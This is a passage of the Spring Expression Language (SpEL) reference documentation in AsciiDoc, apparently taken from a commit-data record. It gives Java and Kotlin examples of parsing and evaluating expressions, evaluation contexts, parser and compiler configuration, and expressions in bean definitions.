birthdate;\n\t\t}\n\n\t\tpublic Inventor() {\n\t\t}\n\n\t\tpublic String getName() {\n\t\t\treturn name;\n\t\t}\n\n\t\tpublic void setName(String name) {\n\t\t\tthis.name = name;\n\t\t}\n\n\t\tpublic String getNationality() {\n\t\t\treturn nationality;\n\t\t}\n\n\t\tpublic void setNationality(String nationality) {\n\t\t\tthis.nationality = nationality;\n\t\t}\n\n\t\tpublic Date getBirthdate() {\n\t\t\treturn birthdate;\n\t\t}\n\n\t\tpublic void setBirthdate(Date birthdate) {\n\t\t\tthis.birthdate = birthdate;\n\t\t}\n\n\t\tpublic PlaceOfBirth getPlaceOfBirth() {\n\t\t\treturn placeOfBirth;\n\t\t}\n\n\t\tpublic void setPlaceOfBirth(PlaceOfBirth placeOfBirth) {\n\t\t\tthis.placeOfBirth = placeOfBirth;\n\t\t}\n\n\t\tpublic void setInventions(String[] inventions) {\n\t\t\tthis.inventions = inventions;\n\t\t}\n\n\t\tpublic String[] getInventions() {\n\t\t\treturn inventions;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Inventor.kt\n----\nclass Inventor(\n\tvar name: String,\n\tvar nationality: String,\n\tvar inventions: Array<String>? = null,\n\tvar birthdate: Date = GregorianCalendar().time,\n\tvar placeOfBirth: PlaceOfBirth? = null)
\n----\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.PlaceOfBirth.java\n----\n\tpackage org.spring.samples.spel.inventor;\n\n\tpublic class PlaceOfBirth {\n\n\t\tprivate String city;\n\t\tprivate String country;\n\n\t\tpublic PlaceOfBirth(String city) {\n\t\t\tthis.city = city;\n\t\t}\n\n\t\tpublic PlaceOfBirth(String city, String country) {\n\t\t\tthis(city);\n\t\t\tthis.country = country;\n\t\t}\n\n\t\tpublic String getCity() {\n\t\t\treturn city;\n\t\t}\n\n\t\tpublic void setCity(String s) {\n\t\t\tthis.city = s;\n\t\t}\n\n\t\tpublic String getCountry() {\n\t\t\treturn country;\n\t\t}\n\n\t\tpublic void setCountry(String country) {\n\t\t\tthis.country = country;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.PlaceOfBirth.kt\n----\n\tclass PlaceOfBirth(var city: String, var country: String? = null)\n----\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Society.java\n----\n\tpackage org.spring.samples.spel.inventor;\n\n\timport java.util.*;\n\n\tpublic class Society {\n\n\t\tprivate String name;\n\n\t\tpublic static String Advisors = \"advisors\";\n\t\tpublic static String President = \"president\";\n\n\t\tprivate List<Inventor> members = new ArrayList<Inventor>();\n\t\tprivate Map officers = new HashMap();\n\n\t\tpublic List getMembers() {\n\t\t\treturn members;\n\t\t}\n\n\t\tpublic Map getOfficers() {\n\t\t\treturn officers;\n\t\t}\n\n\t\tpublic String getName() {\n\t\t\treturn name;\n\t\t}\n\n\t\tpublic void setName(String name) {\n\t\t\tthis.name = name;\n\t\t}\n\n\t\tpublic boolean isMember(String name) {\n\t\t\tfor (Inventor inventor : members) {\n\t\t\t\tif (inventor.getName().equals(name)) {\n\t\t\t\t\treturn true;\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn false;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Society.kt\n----\n\tpackage org.spring.samples.spel.inventor\n\n\timport java.util.*\n\n\tclass Society {\n\n\t\tval Advisors = \"advisors\"\n\t\tval President = \"president\"\n\n\t\tvar name: String? = null\n\n\t\tval members = ArrayList<Inventor>()\n\t\tval officers = mapOf<Any, Any>()\n\n\t\tfun isMember(name: String): Boolean {\n\t\t\tfor (inventor in members) {\n\t\t\t\tif (inventor.name == name) {\n\t\t\t\t\treturn true\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn false\n\t\t}\n\t}\n----\n","old_contents":"[[expressions]]\n= Spring Expression Language (SpEL)\n\nThe Spring Expression Language (\"`SpEL`\" for short) is a powerful expression language that\nsupports querying and manipulating an object graph at runtime. The language syntax is\nsimilar to Unified EL but offers additional features, most notably method invocation and\nbasic string templating functionality.\n\nWhile there are several other Java expression languages available -- OGNL, MVEL, and JBoss\nEL, to name a few -- the Spring Expression Language was created to provide the Spring\ncommunity with a single well-supported expression language that can be used across all\nthe products in the Spring portfolio.
\nIts language features are driven by the\nrequirements of the projects in the Spring portfolio, including tooling requirements\nfor code completion support within the https:\/\/spring.io\/tools[Spring Tools for Eclipse].\nThat said, SpEL is based on a technology-agnostic API that lets other expression language\nimplementations be integrated, should the need arise.\n\nWhile SpEL serves as the foundation for expression evaluation within the Spring\nportfolio, it is not directly tied to Spring and can be used independently. To\nbe self-contained, many of the examples in this chapter use SpEL as if it were an\nindependent expression language. This requires creating a few bootstrapping\ninfrastructure classes, such as the parser. Most Spring users need not deal with\nthis infrastructure and can, instead, author only expression strings for evaluation.\nAn example of this typical use is the integration of SpEL into creating XML or\nannotation-based bean definitions, as shown in\n<<expressions-beandef, Expression support for defining bean definitions>>.\n\nThis chapter covers the features of the expression language, its API, and its language\nsyntax. In several places, `Inventor` and `Society` classes are used as the target\nobjects for expression evaluation. These class declarations and the data used to\npopulate them are listed at the end of the chapter.\n\nThe expression language supports the following functionality:\n\n* Literal expressions\n* Boolean and relational operators\n* Regular expressions\n* Class expressions\n* Accessing properties, arrays, lists, and maps\n* Method invocation\n* Assignment\n* Calling constructors\n* Bean references\n* Array construction\n* Inline lists\n* Inline maps\n* Ternary operator\n* Variables\n* User-defined functions\n* Collection projection\n* Collection selection\n* Templated expressions\n\n\n\n\n[[expressions-evaluation]]\n== Evaluation\n\nThis section introduces the simple use of SpEL interfaces and its expression language.\nThe complete language reference can be found in\n<<expressions-language-ref, Language Reference>>.\n\nThe following code introduces the SpEL API to evaluate the literal string expression,\n`Hello World`.\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tExpression exp = parser.parseExpression(\"'Hello World'\"); \/\/ <1>\n\tString message = (String) exp.getValue();\n----\n<1> The value of the message variable is `'Hello World'`.\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval exp = parser.parseExpression(\"'Hello World'\") \/\/ <1>\n\tval message = exp.value as String\n----\n<1> The value of the message variable is `'Hello World'`.\n\n\nThe SpEL classes and interfaces you are most likely to use are located in the\n`org.springframework.expression` package and its sub-packages, such as `spel.support`.\n\nThe `ExpressionParser` interface is responsible for parsing an expression string. In\nthe preceding example, the expression string is a string literal denoted by the surrounding single\nquotation marks. The `Expression` interface is responsible for evaluating the previously defined\nexpression string. Two exceptions, `ParseException` and `EvaluationException`, can be\nthrown when calling `parser.parseExpression` and `exp.getValue`, respectively.\n
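\nThe following minimal sketch shows where each exception can arise (both extend the unchecked `ExpressionException`, so catching them is optional):\n\n[source,java,indent=0,subs=\"verbatim,quotes\"]\n----\n\ttry {\n\t\tExpression exp = parser.parseExpression(\"'Hello World'.concat('!')\"); \/\/ may throw ParseException\n\t\tString message = (String) exp.getValue(); \/\/ may throw EvaluationException\n\t}\n\tcatch (ParseException | EvaluationException ex) {\n\t\t\/\/ handle an invalid expression or a failed evaluation\n\t}\n----\n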
\nSpEL supports a wide range of features, such as calling methods, accessing properties,\nand calling constructors.\n\nIn the following example of method invocation, we call the `concat` method on the string literal:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tExpression exp = parser.parseExpression(\"'Hello World'.concat('!')\"); \/\/ <1>\n\tString message = (String) exp.getValue();\n----\n<1> The value of `message` is now 'Hello World!'.\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval exp = parser.parseExpression(\"'Hello World'.concat('!')\") \/\/ <1>\n\tval message = exp.value as String\n----\n<1> The value of `message` is now 'Hello World!'.\n\nThe following example calls a JavaBean property (the `String` property `Bytes`):\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\t\/\/ invokes 'getBytes()'\n\tExpression exp = parser.parseExpression(\"'Hello World'.bytes\"); \/\/ <1>\n\tbyte[] bytes = (byte[]) exp.getValue();\n----\n<1> This line converts the literal to a byte array.\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\t\/\/ invokes 'getBytes()'\n\tval exp = parser.parseExpression(\"'Hello World'.bytes\") \/\/ <1>\n\tval bytes = exp.value as ByteArray\n----\n<1> This line converts the literal to a byte array.\n\nSpEL also supports nested properties by using the standard dot notation (such as\n`prop1.prop2.prop3`) and also the corresponding setting of property values.\nPublic fields may also be accessed.\n\nThe following example shows how to use dot notation to get the length of a literal:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\t\/\/ invokes 'getBytes().length'\n\tExpression exp = parser.parseExpression(\"'Hello World'.bytes.length\"); \/\/ <1>\n\tint length = (Integer) exp.getValue();\n----\n<1> `'Hello World'.bytes.length` gives the length of the literal.\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\t\/\/ invokes 'getBytes().length'\n\tval exp = parser.parseExpression(\"'Hello World'.bytes.length\") \/\/ <1>\n\tval length = exp.value as Int\n----\n<1> `'Hello World'.bytes.length` gives the length of the literal.\n\nThe `String` constructor can be called instead of using a string literal, as the following\nexample shows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tExpression exp = parser.parseExpression(\"new String('hello world').toUpperCase()\"); \/\/ <1>\n\tString message = exp.getValue(String.class);\n----\n<1> Construct a new `String` from the literal and make it upper case.\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval exp = parser.parseExpression(\"new String('hello world').toUpperCase()\") \/\/ <1>\n\tval message = exp.getValue(String::class.java)\n----\n<1> Construct a new `String` from the literal and make it upper case.\n
\n\nNote the use of the generic method: `public <T> T getValue(Class<T> desiredResultType)`.\nUsing this method removes the need to cast the value of the expression to the desired\nresult type. An `EvaluationException` is thrown if the value cannot be cast to the\ntype `T` or converted by using the registered type converter.\n\nThe more common usage of SpEL is to provide an expression string that is evaluated\nagainst a specific object instance (called the root object). The following example shows\nhow to retrieve the `name` property from an instance of the `Inventor` class or\ncreate a boolean condition:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ Create and set a calendar\n\tGregorianCalendar c = new GregorianCalendar();\n\tc.set(1856, 7, 9);\n\n\t\/\/ The constructor arguments are name, birthday, and nationality.\n\tInventor tesla = new Inventor(\"Nikola Tesla\", c.getTime(), \"Serbian\");\n\n\tExpressionParser parser = new SpelExpressionParser();\n\n\tExpression exp = parser.parseExpression(\"name\"); \/\/ Parse name as an expression\n\tString name = (String) exp.getValue(tesla);\n\t\/\/ name == \"Nikola Tesla\"\n\n\texp = parser.parseExpression(\"name == 'Nikola Tesla'\");\n\tboolean result = exp.getValue(tesla, Boolean.class);\n\t\/\/ result == true\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ Create and set a calendar\n\tval c = GregorianCalendar()\n\tc.set(1856, 7, 9)\n\n\t\/\/ The constructor arguments are name, birthday, and nationality.\n\tval tesla = Inventor(\"Nikola Tesla\", c.time, \"Serbian\")\n\n\tval parser = SpelExpressionParser()\n\n\tvar exp = parser.parseExpression(\"name\") \/\/ Parse name as an expression\n\tval name = exp.getValue(tesla) as String\n\t\/\/ name == \"Nikola Tesla\"\n\n\texp = parser.parseExpression(\"name == 'Nikola Tesla'\")\n\tval result = exp.getValue(tesla, Boolean::class.java)\n\t\/\/ result == true\n----\n\n\n\n\n[[expressions-evaluation-context]]\n=== Understanding `EvaluationContext`\n\nThe `EvaluationContext` interface is used when evaluating an expression to resolve\nproperties, methods, or fields and to help perform type conversion. Spring provides two\nimplementations:\n\n* `SimpleEvaluationContext`: Exposes a subset of essential SpEL language features and\nconfiguration options, for categories of expressions that do not require the full extent\nof the SpEL language syntax and should be meaningfully restricted. Examples include but\nare not limited to data binding expressions and property-based filters.\n\n* `StandardEvaluationContext`: Exposes the full set of SpEL language features and\nconfiguration options. You can use it to specify a default root object and to configure\nevery available evaluation-related strategy.\n\n`SimpleEvaluationContext` is designed to support only a subset of the SpEL language syntax.\nIt excludes Java type references, constructors, and bean references.\n
It also requires\nyou to explicitly choose the level of support for properties and methods in expressions.\nBy default, the `create()` static factory method enables only read access to properties.\nYou can also obtain a builder to configure the exact level of support needed, targeting\none or some combination of the following:\n\n* Custom `PropertyAccessor` only (no reflection)\n* Data binding properties for read-only access\n* Data binding properties for read and write\n\n\n[[expressions-type-conversion]]\n==== Type Conversion\n\nBy default, SpEL uses the conversion service available in Spring core\n(`org.springframework.core.convert.ConversionService`). This conversion service comes\nwith many built-in converters for common conversions but is also fully extensible so that\nyou can add custom conversions between types. Additionally, it is\ngenerics-aware. This means that, when you work with generic types in\nexpressions, SpEL attempts conversions to maintain type correctness for any objects\nit encounters.\n\nWhat does this mean in practice? Suppose assignment, using `setValue()`, is being used\nto set a `List` property. The type of the property is actually `List<Boolean>`. SpEL\nrecognizes that the elements of the list need to be converted to `Boolean` before\nbeing placed in it. The following example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tclass Simple {\n\t\tpublic List<Boolean> booleanList = new ArrayList<Boolean>();\n\t}\n\n\tSimple simple = new Simple();\n\tsimple.booleanList.add(true);\n\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\n\t\/\/ \"false\" is passed in here as a String. SpEL and the conversion service\n\t\/\/ will recognize that it needs to be a Boolean and convert it accordingly.\n\tparser.parseExpression(\"booleanList[0]\").setValue(context, simple, \"false\");\n\n\t\/\/ b is false\n\tBoolean b = simple.booleanList.get(0);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass Simple {\n\t\tvar booleanList: MutableList<Boolean> = ArrayList()\n\t}\n\n\tval simple = Simple()\n\tsimple.booleanList.add(true)\n\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\n\t\/\/ \"false\" is passed in here as a String. SpEL and the conversion service\n\t\/\/ will recognize that it needs to be a Boolean and convert it accordingly.\n\tparser.parseExpression(\"booleanList[0]\").setValue(context, simple, \"false\")\n\n\t\/\/ b is false\n\tval b = simple.booleanList[0]\n----\n\n\n[[expressions-parser-configuration]]\n=== Parser Configuration\n\nIt is possible to configure the SpEL expression parser by using a parser configuration\nobject (`org.springframework.expression.spel.SpelParserConfiguration`). The configuration\nobject controls the behavior of some of the expression components. For example, if you\nindex into an array or collection and the element at the specified index is `null`, SpEL\ncan automatically create the element. This is useful when using expressions made up of a\nchain of property references. If you index into an array or list and specify an index\nthat is beyond the end of the current size of the array or list, SpEL can automatically\ngrow the array or list to accommodate that index. In order to add an element at the\nspecified index, SpEL will try to create the element using the element type's default\nconstructor before setting the specified value. 
If the element type does not have a\ndefault constructor, `null` will be added to the array or list. If there is no built-in\nor custom converter that knows how to set the value, `null` will remain in the array or\nlist at the specified index. The following example demonstrates how to automatically grow\nthe list:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tclass Demo {\n\t\tpublic List<String> list;\n\t}\n\n\t\/\/ Turn on:\n\t\/\/ - auto null reference initialization\n\t\/\/ - auto collection growing\n\tSpelParserConfiguration config = new SpelParserConfiguration(true,true);\n\n\tExpressionParser parser = new SpelExpressionParser(config);\n\n\tExpression expression = parser.parseExpression(\"list[3]\");\n\n\tDemo demo = new Demo();\n\n\tObject o = expression.getValue(demo);\n\n\t\/\/ demo.list will now be a real collection of 4 entries\n\t\/\/ Each entry is a new empty String\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass Demo {\n\t\tvar list: List<String>? = null\n\t}\n\n\t\/\/ Turn on:\n\t\/\/ - auto null reference initialization\n\t\/\/ - auto collection growing\n\tval config = SpelParserConfiguration(true, true)\n\n\tval parser = SpelExpressionParser(config)\n\n\tval expression = parser.parseExpression(\"list[3]\")\n\n\tval demo = Demo()\n\n\tval o = expression.getValue(demo)\n\n\t\/\/ demo.list will now be a real collection of 4 entries\n\t\/\/ Each entry is a new empty String\n----\n\n\n\n[[expressions-spel-compilation]]\n=== SpEL Compilation\n\nSpring Framework 4.1 includes a basic expression compiler. Expressions are usually\ninterpreted, which provides a lot of dynamic flexibility during evaluation but\ndoes not provide optimum performance. For occasional expression usage,\nthis is fine, but, when used by other components such as Spring Integration,\nperformance can be very important, and there is no real need for the dynamism.\n\nThe SpEL compiler is intended to address this need. During evaluation, the compiler\ngenerates a Java class that embodies the expression behavior at runtime and uses that\nclass to achieve much faster expression evaluation. Due to the lack of typing around\nexpressions, the compiler uses information gathered during the interpreted evaluations\nof an expression when performing compilation. For example, it does not know the type\nof a property reference purely from the expression, but during the first interpreted\nevaluation, it finds out what it is. Of course, basing compilation on such derived\ninformation can cause trouble later if the types of the various expression elements\nchange over time. For this reason, compilation is best suited to expressions whose\ntype information is not going to change on repeated evaluations.\n\nConsider the following basic expression:\n\n----\nsomeArray[0].someProperty.someOtherProperty < 0.1\n----\n\nBecause the preceding expression involves array access, some property de-referencing,\nand numeric operations, the performance gain can be very noticeable. In an example\nmicro benchmark run of 50000 iterations, it took 75ms to evaluate by using the\ninterpreter and only 3ms using the compiled version of the expression.\n\n\n[[expressions-compiler-configuration]]\n==== Compiler Configuration\n\nThe compiler is not turned on by default, but you can turn it on in either of two\ndifferent ways. 
You can turn it on by using the parser configuration process\n(<<expressions-parser-configuration, discussed earlier>>) or by using a system\nproperty when SpEL usage is embedded inside another component. This section\ndiscusses both of these options.\n\nThe compiler can operate in one of three modes, which are captured in the\n`org.springframework.expression.spel.SpelCompilerMode` enum. The modes are as follows:\n\n* `OFF` (default): The compiler is switched off.\n* `IMMEDIATE`: In immediate mode, the expressions are compiled as soon as possible. This\nis typically after the first interpreted evaluation. If the compiled expression fails\n(typically due to a type changing, as described earlier), the caller of the expression\nevaluation receives an exception.\n* `MIXED`: In mixed mode, the expressions silently switch between interpreted and compiled\nmode over time. After some number of interpreted runs, they switch to compiled\nform and, if something goes wrong with the compiled form (such as a type changing, as\ndescribed earlier), the expression automatically switches back to interpreted form\nagain. Sometime later, it may generate another compiled form and switch to it. Basically,\nthe exception that the user gets in `IMMEDIATE` mode is instead handled internally.\n\n`IMMEDIATE` mode exists because `MIXED` mode could cause issues for expressions that\nhave side effects. If a compiled expression blows up after partially succeeding, it\nmay have already done something that has affected the state of the system. If this\nhas happened, the caller may not want it to silently re-run in interpreted mode,\nsince part of the expression may be running twice.\n\nAfter selecting a mode, use the `SpelParserConfiguration` to configure the parser. The\nfollowing example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tSpelParserConfiguration config = new SpelParserConfiguration(SpelCompilerMode.IMMEDIATE,\n\t\tthis.getClass().getClassLoader());\n\n\tSpelExpressionParser parser = new SpelExpressionParser(config);\n\n\tExpression expr = parser.parseExpression(\"payload\");\n\n\tMyMessage message = new MyMessage();\n\n\tObject payload = expr.getValue(message);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval config = SpelParserConfiguration(SpelCompilerMode.IMMEDIATE,\n\t\t\tthis.javaClass.classLoader)\n\n\tval parser = SpelExpressionParser(config)\n\n\tval expr = parser.parseExpression(\"payload\")\n\n\tval message = MyMessage()\n\n\tval payload = expr.getValue(message)\n----\n\nWhen you specify the compiler mode, you can also specify a classloader (passing null is allowed).\nCompiled expressions are defined in a child classloader created under any that is supplied.\nIt is important to ensure that, if a classloader is specified, it can see all the types involved in\nthe expression evaluation process. If you do not specify a classloader, a default classloader is used\n(typically the context classloader for the thread that is running during expression evaluation).\n\nThe second way to configure the compiler is for use when SpEL is embedded inside some other\ncomponent and it may not be possible to configure it through a configuration object. In these\ncases, it is possible to use a system property. 
You can set the `spring.expression.compiler.mode`\nproperty to one of the `SpelCompilerMode` enum values (`off`, `immediate`, or `mixed`).\n\n\n[[expressions-compiler-limitations]]\n==== Compiler Limitations\n\nSince Spring Framework 4.1, the basic compilation framework is in place. However, the framework\ndoes not yet support compiling every kind of expression. The initial focus has been on the\ncommon expressions that are likely to be used in performance-critical contexts. The following\nkinds of expression cannot be compiled at the moment:\n\n* Expressions involving assignment\n* Expressions relying on the conversion service\n* Expressions using custom resolvers or accessors\n* Expressions using selection or projection\n\nMore types of expression will be compilable in the future.\n\n\n\n\n[[expressions-beandef]]\n== Expressions in Bean Definitions\n\nYou can use SpEL expressions with XML-based or annotation-based configuration metadata for\ndefining `BeanDefinition` instances. In both cases, the syntax to define the expression is of the\nform `#{ <expression string> }`.\n\n\n\n[[expressions-beandef-xml-based]]\n=== XML Configuration\n\nA property or constructor argument value can be set by using expressions, as the following\nexample shows:\n\n[source,xml,indent=0,subs=\"verbatim\"]\n----\n\t<bean id=\"numberGuess\" class=\"org.spring.samples.NumberGuess\">\n\t\t<property name=\"randomNumber\" value=\"#{ T(java.lang.Math).random() * 100.0 }\"\/>\n\n\t\t<!-- other properties -->\n\t<\/bean>\n----\n\nAll beans in the application context are available as predefined variables with their\ncommon bean name. This includes standard context beans such as `environment` (of type\n`org.springframework.core.env.Environment`) as well as `systemProperties` and\n`systemEnvironment` (of type `Map<String, Object>`) for access to the runtime environment.\n\nThe following example shows access to the `systemProperties` bean as a SpEL variable:\n\n[source,xml,indent=0,subs=\"verbatim\"]\n----\n\t<bean id=\"taxCalculator\" class=\"org.spring.samples.TaxCalculator\">\n\t\t<property name=\"defaultLocale\" value=\"#{ systemProperties['user.region'] }\"\/>\n\n\t\t<!-- other properties -->\n\t<\/bean>\n----\n\nNote that you do not have to prefix the predefined variable with the `#` symbol here.\n\nYou can also refer to other bean properties by name, as the following example shows:\n\n[source,xml,indent=0,subs=\"verbatim\"]\n----\n\t<bean id=\"numberGuess\" class=\"org.spring.samples.NumberGuess\">\n\t\t<property name=\"randomNumber\" value=\"#{ T(java.lang.Math).random() * 100.0 }\"\/>\n\n\t\t<!-- other properties -->\n\t<\/bean>\n\n\t<bean id=\"shapeGuess\" class=\"org.spring.samples.ShapeGuess\">\n\t\t<property name=\"initialShapeSeed\" value=\"#{ numberGuess.randomNumber }\"\/>\n\n\t\t<!-- other properties -->\n\t<\/bean>\n----\n\n\n\n[[expressions-beandef-annotation-based]]\n=== Annotation Configuration\n\nTo specify a default value, you can place the `@Value` annotation on fields, methods,\nand method or constructor parameters.\n\nThe following example sets the default value of a field variable:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\tpublic class FieldValueTestBean {\n\n\t\t\t@Value(\"#{ systemProperties['user.region'] }\")\n\t\t\tprivate String defaultLocale;\n\n\t\t\tpublic void setDefaultLocale(String defaultLocale) {\n\t\t\t\tthis.defaultLocale = defaultLocale;\n\t\t\t}\n\n\t\t\tpublic String getDefaultLocale() {\n\t\t\t\treturn 
this.defaultLocale;\n\t\t\t}\n\t\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass FieldValueTestBean {\n\n\t\t@Value(\"#{ systemProperties['user.region'] }\")\n\t\tvar defaultLocale: String? = null\n\t}\n----\n\nThe following example shows the equivalent but on a property setter method:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic class PropertyValueTestBean {\n\n\t\tprivate String defaultLocale;\n\n\t\t@Value(\"#{ systemProperties['user.region'] }\")\n\t\tpublic void setDefaultLocale(String defaultLocale) {\n\t\t\tthis.defaultLocale = defaultLocale;\n\t\t}\n\n\t\tpublic String getDefaultLocale() {\n\t\t\treturn this.defaultLocale;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass PropertyValueTestBean {\n\n\t\t@Value(\"#{ systemProperties['user.region'] }\")\n\t\tvar defaultLocale: String? = null\n\t}\n----\n\nAutowired methods and constructors can also use the `@Value` annotation, as the following\nexamples show:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\t\tprivate String defaultLocale;\n\n\t\t@Autowired\n\t\tpublic void configure(MovieFinder movieFinder,\n\t\t\t\t@Value(\"#{ systemProperties['user.region'] }\") String defaultLocale) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t\tthis.defaultLocale = defaultLocale;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass SimpleMovieLister {\n\n\t\tprivate lateinit var movieFinder: MovieFinder\n\t\tprivate lateinit var defaultLocale: String\n\n\t\t@Autowired\n\t\tfun configure(movieFinder: MovieFinder,\n\t\t\t\t\t@Value(\"#{ systemProperties['user.region'] }\") defaultLocale: String) {\n\t\t\tthis.movieFinder = movieFinder\n\t\t\tthis.defaultLocale = defaultLocale\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate String defaultLocale;\n\n\t\tprivate CustomerPreferenceDao customerPreferenceDao;\n\n\t\tpublic MovieRecommender(CustomerPreferenceDao customerPreferenceDao,\n\t\t\t\t@Value(\"#{systemProperties['user.country']}\") String defaultLocale) {\n\t\t\tthis.customerPreferenceDao = customerPreferenceDao;\n\t\t\tthis.defaultLocale = defaultLocale;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass MovieRecommender(private val customerPreferenceDao: CustomerPreferenceDao,\n\t\t\t\t@Value(\"#{systemProperties['user.country']}\") private val defaultLocale: String) {\n\t\t\/\/ ...\t\n\t}\n----\n\n\n\n\n[[expressions-language-ref]]\n== Language Reference\n\nThis section describes how the Spring Expression Language works. 
It covers the following\ntopics:\n\n* <<expressions-ref-literal>>\n* <<expressions-properties-arrays>>\n* <<expressions-inline-lists>>\n* <<expressions-inline-maps>>\n* <<expressions-array-construction>>\n* <<expressions-methods>>\n* <<expressions-operators>>\n* <<expressions-types>>\n* <<expressions-constructors>>\n* <<expressions-ref-variables>>\n* <<expressions-ref-functions>>\n* <<expressions-bean-references>>\n* <<expressions-operator-ternary>>\n* <<expressions-operator-elvis>>\n* <<expressions-operator-safe-navigation>>\n\n\n\n[[expressions-ref-literal]]\n=== Literal Expressions\n\nThe types of literal expressions supported are strings, numeric values (int, real, hex),\nboolean, and null. Strings are delimited by single quotation marks. To put a single quotation mark itself\nin a string, use two single quotation mark characters.\n\nThe following listing shows simple usage of literals. Typically, they are not used\nin isolation like this but, rather, as part of a more complex expression -- for example,\nusing a literal on one side of a logical comparison operator.\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\t\/\/ evals to \"Hello World\"\n\tString helloWorld = (String) parser.parseExpression(\"'Hello World'\").getValue();\n\n\t\/\/ evals to \"Tony's Pizza\" (the doubled single quotation mark escapes the quotation mark)\n\tString pizzaParlour = (String) parser.parseExpression(\"'Tony''s Pizza'\").getValue();\n\n\tdouble avogadrosNumber = (Double) parser.parseExpression(\"6.0221415E+23\").getValue();\n\n\t\/\/ evals to 2147483647\n\tint maxValue = (Integer) parser.parseExpression(\"0x7FFFFFFF\").getValue();\n\n\tboolean trueValue = (Boolean) parser.parseExpression(\"true\").getValue();\n\n\tObject nullValue = parser.parseExpression(\"null\").getValue();\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\t\/\/ evals to \"Hello World\"\n\tval helloWorld = parser.parseExpression(\"'Hello World'\").value as String\n\n\t\/\/ evals to \"Tony's Pizza\" (the doubled single quotation mark escapes the quotation mark)\n\tval pizzaParlour = parser.parseExpression(\"'Tony''s Pizza'\").value as String\n\n\tval avogadrosNumber = parser.parseExpression(\"6.0221415E+23\").value as Double\n\n\t\/\/ evals to 2147483647\n\tval maxValue = parser.parseExpression(\"0x7FFFFFFF\").value as Int\n\n\tval trueValue = parser.parseExpression(\"true\").value as Boolean\n\n\tval nullValue = parser.parseExpression(\"null\").value\n----\n\nNumbers support the use of the negative sign, exponential notation, and decimal points.\nBy default, real numbers are parsed by using `Double.parseDouble()`.\n\n\n\n[[expressions-properties-arrays]]\n=== Properties, Arrays, Lists, Maps, and Indexers\n\nNavigating with property references is easy. To do so, use a period to indicate a nested\nproperty value. 
